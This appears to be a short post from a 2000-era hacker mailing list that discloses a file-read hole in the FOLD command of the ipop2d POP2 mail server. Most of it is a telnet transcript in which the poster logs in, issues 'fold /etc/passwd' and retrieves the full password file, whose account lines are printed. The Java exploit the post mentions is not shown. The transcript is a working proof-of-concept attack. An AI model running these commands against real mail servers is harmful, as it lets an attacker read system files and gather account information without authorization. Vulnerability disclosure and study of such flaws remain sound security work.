While working to port ipop2d exploit to java discovered another hole in
the FOLD command of ipop2d...  The ability to read files that are
readable via the pop2d userid. Attached is a ported exploit in java for
bnc... as well as the pop2d exploit transcript.

-d0tslash
#b10z EFnet
#9x EFnet


[mandark@mandark mandark]$ telnet localhost 109
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
+ POP2 localhost.localdomain v4.46 server ready
helo mandark PASSHERE
#1 messages in /var/spool/mail/mandark
read 1
=389 characters in message 1
retr
Return-Path: <root@mandark.jumpline.com>
Received: (from root@localhost)
        by mandark.jumpline.com (8.10.1/8.10.1) id e6EGS7C27037
        for mandark@localhost; Fri, 14 Jul 2000 12:28:07 -0400
Date: Fri, 14 Jul 2000 12:28:07 -0400
From: root <root@mandark.jumpline.com>
Message-Id: <200007141628.e6EGS7C27037@mandark.jumpline.com>
To: mandark@mandark.jumpline.com
Status: RO

fuckme

acks
=0 No more messages
fold /etc/passwd
#1 messages in /etc/passwd
read 1
=1178 characters in message 1
retr
Date: Thu, 13 Jul 2000 16:50:07 -0400
From: root@mandark.jumpline.com
Subject: /etc/passwd
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Status:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:100:101:X Font Server:/etc/X11/fs:/bin/false
postfix:x:101:104:postfix:/var/spool/postfix:
gdm:x:0:0::/home/gdm:/bin/bash
mandark:x:500:503::/home/mandark:/bin/bash
godie:x:0:0::/home/godie:/bin/bash
mp3:x:501:506::/mp3:/bin/bash
chefo:x:502:507::/home/chefo:/bin/bash
crunch:x:503:508::/home/crunch:/bin/bash
gsx:x:505:510::/home/gsx:/bin/csh
matt:x:506:511::/home/matt:/bin/bash
lyw0d:x:507:512::/home/lyw0d:/bin/bash